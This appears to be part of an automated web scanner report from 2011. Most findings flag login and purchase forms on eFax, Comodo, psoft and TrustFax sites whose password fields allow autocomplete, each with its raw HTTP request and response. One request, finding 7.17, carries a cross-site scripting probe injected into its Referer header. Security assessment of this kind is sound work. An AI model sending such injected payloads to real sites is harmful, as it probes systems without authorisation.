Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:19:43 GMT
Content-Length: 39406
X-TWA-Web: pa:28012
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http
...[SNIP]...
<div id="tabContent_user" class="loginTabContent" style=""> <form novalidate="novalidate" action="https://www.efaxcorporate.com/corp/twa/login" name="user" id="user" method="POST" style="width: 100%;"> <input type="hidden" name="formName" value="user" />
...[SNIP]...
<div style="margin-bottom: 5px; clear: both;"><input type="password" id="userpassword" maxlength="20" size="15" setcookie="false" name="password" value="" onkeyup="isValid(this, '');" onblur="isValid(this, '');" required="true" validationtype="password" style="float: left;" class="textInput" /> <div style="clear: both;">
...[SNIP]...

7.4. http://efaxcorporate.com/solutions/Compatibility/Industry-Compatibility  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://efaxcorporate.com
Path:   /solutions/Compatibility/Industry-Compatibility

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /solutions/Compatibility/Industry-Compatibility HTTP/1.1
Host: efaxcorporate.com
Proxy-Connection: keep-alive
Referer: http://efaxcorporate.com/?utm_source=j2&utm_medium=cross+sell&utm_campaign=enterprise+page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AKAINFO="client=eozbczabczaof//areacode=408//city=SANJOSE//state=CA//country=US//region=NA//bandwidth=vhigh//timezone=PST//version=3"; brand=efaxcorp; __g_c=w%3A1%7Cb%3A2; mbox=check#true#1316366487|session#1316366426074-552683#1316368287; s_cc=true; s_ev4=%5B%5B%27home.j2.com%27%2C%271316366426332%27%5D%5D; s_ev5=%5B%5B%27Referrers%27%2C%271316366426333%27%5D%5D; j2CampaignTracking=; __utma=110028753.680056721.1316366426.1316366426.1316366426.1; __utmb=110028753.1.10.1316366426; __utmc=110028753; __utmz=110028753.1316366426.1.1.utmcsr=j2|utmccn=enterprise%20page|utmcmd=cross%20sell; c_m=undefinedhome.j2.comhome.j2.com; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:19:43 GMT
Server: Apache
Vary: Host,Accept-Encoding
X-Magnolia-Registration: Registered
Set-Cookie: JSESSIONID=96D358893B7F3897A12EA3F682AD7C0A.efaxcorp1a; Path=/efaxcorp-cms-public
Set-Cookie: brand=efaxcorp; Domain=.efaxcorporate.com; Path=/
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:19:43 GMT
Content-Length: 39406
X-TWA-Web: pa:28012
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http
...[SNIP]...
<div id="tabContent_admin" class="loginTabContent" style="display: none;"> <form novalidate="novalidate" action="https://www.efaxcorporate.com/corp/twa/login" name="admin" id="admin" method="POST" style="width: 100%;"> <input type="hidden" name="formName" value="admin" />
...[SNIP]...
<div style="margin-bottom: 5px; clear: both;"><input type="password" id="adminpassword" maxlength="25" size="15" setcookie="false" name="password" value="" onkeyup="isValid(this, 'option')" onblur="isValid(this, 'option');" required="true" validationtype="password" style="float: left;" class="textInput" /> <div style="clear: both;">
...[SNIP]...

7.5. http://forum.psoft.net/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://forum.psoft.net
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: forum.psoft.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:33:23 GMT
Server: Apache
Set-Cookie: bb_lastactivity=0; expires=Mon, 17-Sep-2012 12:33:23 GMT; path=/; domain=.psoft.net
Expires: 0
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Content-Length: 99991
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" id="vbulletin_
...[SNIP]...
</script>
           <form id="navbar_loginform" action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
               <fieldset id="logindetails" class="logindetails">
...[SNIP]...
<input type="text" class="textbox default-value" name="vb_login_username" id="navbar_username" size="10" accesskey="u" tabindex="101" value="User Name" />
                   <input type="password" class="textbox" tabindex="102" name="vb_login_password" id="navbar_password" size="10" />
                   <input type="text" class="textbox default-value" tabindex="102" name="vb_login_password_hint" id="navbar_password_hint" size="10" value="Password" style="display:none;" />
...[SNIP]...

7.6. http://forums.comodo.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://forums.comodo.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: forums.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:06:41 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: private
Pragma: no-cache
Last-Modified: Sun, 18 Sep 2011 11:06:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 101044

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <meta http-equiv="Content-T
...[SNIP]...
</script>

                           <form action="https://forums.comodo.com/index.php?action=login2" method="post" style="margin: 3px 1ex 1px 0;">
                               <div style="text-align: right;">
...[SNIP]...
<input type="text" name="user" autocomplete="off" size="10" /> <input type="password" name="passwrd" size="10" />
                                   <select name="cookielength">
...[SNIP]...

7.7. http://forums.comodo.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://forums.comodo.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: forums.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:06:41 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: private
Pragma: no-cache
Last-Modified: Sun, 18 Sep 2011 11:06:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 101044

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <meta http-equiv="Content-T
...[SNIP]...
<td class="windowbg2" valign="middle">
           <form action="https://forums.comodo.com/index.php?action=login2" method="post" style="margin: 0;">
               <table border="0" cellpadding="2" cellspacing="0" width="100%">
...[SNIP]...
<br /><input type="password" name="passwrd" id="passwrd" size="15" /></label>
...[SNIP]...

7.8. http://hackerguardian.com/pci-compliance/addsupport/ssl-purchase.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://hackerguardian.com
Path:   /pci-compliance/addsupport/ssl-purchase.html

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /pci-compliance/addsupport/ssl-purchase.html HTTP/1.1
Host: hackerguardian.com
Proxy-Connection: keep-alive
Referer: http://hackerguardian.com/hackerguardian/buy/pci_free_scan.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optimizelyEndUserId=oeu1316362675388r0.6238376419059932; ap=; referrerURL=http%3A//www.comodo.com/e-commerce/; entryURL=http%3A//hackerguardian.com/hackerguardian/buy/pci_free_scan.html; __utma=212060173.773737511.1316362678.1316362678.1316362678.1; __utmc=212060173; __utmz=212060173.1316362678.1.1.utmcsr=comodo.com|utmccn=(referral)|utmcmd=referral|utmcct=/e-commerce/; optimizelyBuckets=%7B%7D; __utmb=212060173.1.10.1316362681; shopcart_s=hgFreePCISS&Free PCI Scan&0&3460; prodid=&3460; currency=USD; region=North%20America; country=US

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:17:24 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 76758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script src="//cdn.opti
...[SNIP]...
</script>


<form onsubmit="return wrapvalidate(validate());" name="evssl" id="evssl" method="post" action="https://secure.comodo.com/products/!PlaceOrder" onSubmit="javascript:__utmLinkPost('/G/securepurchase/HG-addsupport_sslpurchase/proceedtocheckout_btn')">
<script type="text/javascript" >
...[SNIP]...
<td align="left" valign="top">
<input name="loginPassword" type="password" id="loginPassword" value="" size="45">&#160;
        <!--<a onClick="javascript:popUp('password-rules.html')" style="cursor:pointer " name="Rules for Password Complexity">
...[SNIP]...
<td align="left" valign="top">
<input name="verifyPassword" type="password" id="verifyPassword" value="" size="45"></td>
...[SNIP]...

7.9. https://hackerguardian.com/pci-compliance/addsupport/ssl-purchase.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hackerguardian.com
Path:   /pci-compliance/addsupport/ssl-purchase.html

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /pci-compliance/addsupport/ssl-purchase.html HTTP/1.1
Host: hackerguardian.com
Connection: keep-alive
Referer: https://hackerguardian.com/hackerguardian/buy/pci_free_scan.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: countryName=; loginName=324234234; optimizelyEndUserId=oeu1316362675388r0.6238376419059932; shopcart_s=hgFreePCISS&Free PCI Scan&0&3460; prodid=&3460; __utma=1.620635661.1316362711.1316362711.1316362711.1; __utmc=1; __utmz=1.1316362711.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmx=212060173.; __utmxx=212060173.; optimizelyBuckets=%7B%7D; __utma=212060173.773737511.1316362678.1316362678.1316362678.1; __utmb=212060173.5.10.1316362681; __utmc=212060173; __utmz=212060173.1316362678.1.1.utmcsr=comodo.com|utmccn=(referral)|utmcmd=referral|utmcct=/e-commerce/; ap=; referrerURL=https%3A//www.hackerguardian.com/sas/login.jsp%3Flogin_error%3D1; entryURL=https%3A//hackerguardian.com/hackerguardian/learn/free_vuln_scan.html; currency=USD; region=North%20America; country=US

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:55:37 GMT
Server: Apache
Accept-Ranges: bytes
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 76758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script src="//cdn.opti
...[SNIP]...
</script>


<form onsubmit="return wrapvalidate(validate());" name="evssl" id="evssl" method="post" action="https://secure.comodo.com/products/!PlaceOrder" onSubmit="javascript:__utmLinkPost('/G/securepurchase/HG-addsupport_sslpurchase/proceedtocheckout_btn')">
<script type="text/javascript" >
...[SNIP]...
<td align="left" valign="top">
<input name="loginPassword" type="password" id="loginPassword" value="" size="45">&#160;
        <!--<a onClick="javascript:popUp('password-rules.html')" style="cursor:pointer " name="Rules for Password Complexity">
...[SNIP]...
<td align="left" valign="top">
<input name="verifyPassword" type="password" id="verifyPassword" value="" size="45"></td>
...[SNIP]...

7.10. https://my.psoft.net/my-hsphere/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://my.psoft.net
Path:   /my-hsphere/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /my-hsphere/ HTTP/1.1
Host: my.psoft.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:31:50 GMT
Server: Apache/1.3.39 (Unix) PHP/4.4.7 mod_throttle/3.1.2 mod_psoft_traffic/0.2 mod_ssl/2.8.29 OpenSSL/0.9.7a
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 4537

<html>
<head>
<title>Welcome - My H-Sphere</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link rel="icon" href="/images/favicon.png" type="image/png">
<LINK hre
...[SNIP]...
<table border=0 cellspacing=3 cellpadding=0>
<form action="login.php" method="POST">
<tr>
...[SNIP]...
<td><input type="password" name="login_password" size="10" style="width: 100px"></td>
...[SNIP]...

7.11. https://secure.comodo.com/home/purchase.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.comodo.com
Path:   /home/purchase.php

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /home/purchase.php?pid=9&utm_source=pfw_fd&utm_medium=buy_free_download&af=1144&utm_campaign=PF_CIS_BUY_FD HTTP/1.1
Host: secure.comodo.com
Connection: keep-alive
Referer: http://personalfirewall.comodo.com/free-download.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optimizelyEndUserId=oeu1315419552319r0.6822604623157531; kvcd=1316328651224; km_ai=nxNThomVDaBwwqN7xx0NPXpwd58%3D; km_vs=1; km_lv=1316328651; km_uq=; optimizelyCustomEvents=%7B%228018129%22%3A%5B%22Need%20a%20pc%20expert%20try%20it%20now%20button%22%5D%7D; optimizelyBuckets=%7B%228015120%22%3A8013305%2C%228022314%22%3A8017411%7D; __utma=1.355449779.1315419555.1315419555.1315419555.1; __utmb=1.4.10.1316328649; __utmc=1; __utmz=1.1315419555.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)|utmctr=comodo

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 01:50:26 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 42824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <script src="//cdn.opti
...[SNIP]...
</h1>
           
           
                       <form name="select-product" method="post" action="order.php">
                               <div class="top-error">
...[SNIP]...
<td colspan="2"><input type="password" id="password" name="password" value="" /></td>
...[SNIP]...
<td colspan="2"><input type="password" id="verify_password" name="verify_password" value="" /></td>
...[SNIP]...
<input type="hidden" id="cc_cvv" name="cc_cvv" value="ab8d81f3c06b6c3f3c62ddfb12285f8f026ff0618" />
                               <input type="password" maxlength="4" id="ab8d81f3c06b6c3f3c62ddfb12285f8f026ff0618" name="ab8d81f3c06b6c3f3c62ddfb12285f8f026ff0618" class="small" />
                           </td>
...[SNIP]...

7.12. https://secure.comodo.com/products/frontpage  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.comodo.com
Path:   /products/frontpage

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /products/frontpage HTTP/1.1
Host: secure.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:30:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Pragma: no-cache
Cache-Control: max-age=-1
Expires: -1
Content-Length: 9504

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>COMODO Security Services</title>
<link rel=stylesheet href=/css/css.css>
</head>
<body bgcolor=#999999 te
...[SNIP]...
<table width=100% border=0 cellspacing=0 cellpadding=2 bgcolor=#E8E8E8>
<form method=post action=/products/login>
<input type=hidden name=SID value=GCRgqIREIML2YPW0>
...[SNIP]...
<br><input type=password name=loginPassword maxlength=128 size=15 value="" class=input2>
</td>
...[SNIP]...

7.13. https://secure.comodo.net/home/purchase.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.comodo.net
Path:   /home/purchase.php

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /home/purchase.php HTTP/1.1
Host: secure.comodo.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:30:50 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 43298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <script src="//cdn.opti
...[SNIP]...
</h1>
           
           
                       <form name="select-product" method="post" action="order.php">
                               <div class="top-error">
...[SNIP]...
<td colspan="2"><input type="password" id="password" name="password" value="" /></td>
...[SNIP]...
<td colspan="2"><input type="password" id="verify_password" name="verify_password" value="" /></td>
...[SNIP]...
<input type="hidden" id="cc_cvv" name="cc_cvv" value="a5f32a746cac8286cd87ce2033e708b8fb30be314" />
                               <input type="password" maxlength="4" id="a5f32a746cac8286cd87ce2033e708b8fb30be314" name="a5f32a746cac8286cd87ce2033e708b8fb30be314" class="small" />
                           </td>
...[SNIP]...

7.14. https://secure.comodo.net/products/frontpage  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.comodo.net
Path:   /products/frontpage

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /products/frontpage HTTP/1.1
Host: secure.comodo.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:30:51 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Pragma: no-cache
Cache-Control: max-age=-1
Expires: -1
Content-Length: 9504

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>COMODO Security Services</title>
<link rel=stylesheet href=/css/css.css>
</head>
<body bgcolor=#999999 te
...[SNIP]...
<table width=100% border=0 cellspacing=0 cellpadding=2 bgcolor=#E8E8E8>
<form method=post action=/products/login>
<input type=hidden name=SID value=VwsLakBNQ5O17KAF>
...[SNIP]...
<br><input type=password name=loginPassword maxlength=128 size=15 value="" class=input2>
</td>
...[SNIP]...

7.15. https://secure.instantssl.com/products/SSLIdASignup1a  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.instantssl.com
Path:   /products/SSLIdASignup1a

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

POST /products/SSLIdASignup1a HTTP/1.1
Host: secure.instantssl.com
Connection: keep-alive
Referer: https://secure.instantssl.com/products/frontpage?area=SSL&product=342&days=90&ap=InstantSSL
Content-Length: 85
Cache-Control: max-age=0
Origin: https://secure.instantssl.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optimizelyEndUserId=oeu1316328656750r0.6942118240986019; __utmx=261615573.; __utmxx=261615573.; optimizelyBuckets=%7B%229298079%22%3A9298080%7D; __utma=261615573.129590781.1316328660.1316328660.1316362417.2; __utmb=261615573; __utmc=261615573; __utmz=261615573.1316362417.2.2.utmccn=(referral)|utmcsr=comodo.com|utmcct=/e-commerce/ssl-certificates/free-ssl-cert.php|utmcmd=referral

SID=NtcydAl8wNmXs5S2&product=342&days=90&loginName=&loginPassword=&loginErrorMessage=

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:12:42 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Pragma: no-cache
Cache-Control: max-age=-1
Expires: -1
Content-Length: 18028

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>InstantSSL Security Services</title>
<link rel=stylesheet href=/css/css.css>
</head>
<body bgcolor=#99999
...[SNIP]...
<table width=100% border=0 cellspacing=0 cellpadding=2 bgcolor=#E8E8E8>
<form method=post action=/products/login>
<input type=hidden name=SID value=NtcydAl8wNmXs5S2>
...[SNIP]...
<br><input type=password name=loginPassword maxlength=128 size=15 value="" class=input2>
</td>
...[SNIP]...

7.16. https://secure.instantssl.com/products/frontpage  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.instantssl.com
Path:   /products/frontpage

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /products/frontpage HTTP/1.1
Host: secure.instantssl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:30:42 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Pragma: no-cache
Cache-Control: max-age=-1
Expires: -1
Content-Length: 9504

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>COMODO Security Services</title>
<link rel=stylesheet href=/css/css.css>
</head>
<body bgcolor=#999999 te
...[SNIP]...
<table width=100% border=0 cellspacing=0 cellpadding=2 bgcolor=#E8E8E8>
<form method=post action=/products/login>
<input type=hidden name=SID value=68LCY39SkyhcQJ5g>
...[SNIP]...
<br><input type=password name=loginPassword maxlength=128 size=15 value="" class=input2>
</td>
...[SNIP]...

7.17. https://secure.trustfax.com/doccorpweb/tf/tf_signup.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.trustfax.com
Path:   /doccorpweb/tf/tf_signup.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /doccorpweb/tf/tf_signup.jsp?pc=TF011909A HTTP/1.1
Host: secure.trustfax.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.trustfax.com/pricing.htmlaf10d--%3E%3Cimg%20src%3da%20onerror%3dalert(document.location)%3E0bedec460c4
Cookie: mbox=check#true#1316364867|session#1316364807021-280353#1316366668|PC#1316364807021-280353.19#1318179210; s_cc=true; c_m=undefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com; s_ev4=%5B%5B%27www.fakereferrerdominator.com%27%2C%271316364810621%27%5D%5D; s_ev5=%5B%5B%27Referrers%27%2C%271316364810623%27%5D%5D; s_sq=%5B%5BB%5D%5D; __utma=110010688.913254444.1316364811.1316364811.1316364811.1; __utmb=110010688.1.10.1316364811; __utmc=110010688; __utmz=110010688.1316364811.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=iso-8859-1
Date: Sun, 18 Sep 2011 11:53:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta ht
...[SNIP]...
<div id="signup-form-form">
<form action="" method="post" id="formSignup" name="formSignup">
<input type="hidden" value="" name="track" />
...[SNIP]...
<div class="formInput">
<input type="password" onblur="validateMe('choosePassword');" value="" maxlength="25" size="30" id="choosePassword" name="choosePassword"/>
</div>
...[SNIP]...
<div class="formInput">
<input type="password" onblur="validateMe('confirmChoosePassword');" value="" maxlength="25" size="30" name="confirmChoosePassword" id="confirmChoosePassword"/>
</div>
...[SNIP]...

7.18. https://secure.trustfax.com/doccorpweb/tf/tf_signup.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.trustfax.com
Path:   /doccorpweb/tf/tf_signup.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /doccorpweb/tf/tf_signup.jsp HTTP/1.1
Host: secure.trustfax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=iso-8859-1
Date: Sun, 18 Sep 2011 12:30:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta ht
...[SNIP]...
<div id="signup-form-form">
<form action="" method="post" id="formSignup" name="formSignup">
<input type="hidden" value="" name="track" />
...[SNIP]...
<div class="formInput">
<input type="password" onblur="validateMe('choosePassword');" value="" maxlength="25" size="30" id="choosePassword" name="choosePassword"/>
</div>
...[SNIP]...
<div class="formInput">
<input type="password" onblur="validateMe('confirmChoosePassword');" value="" maxlength="25" size="30" name="confirmChoosePassword" id="confirmChoosePassword"/>
</div>
...[SNIP]...

7.19. https://support.comodo.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://support.comodo.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: support.comodo.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
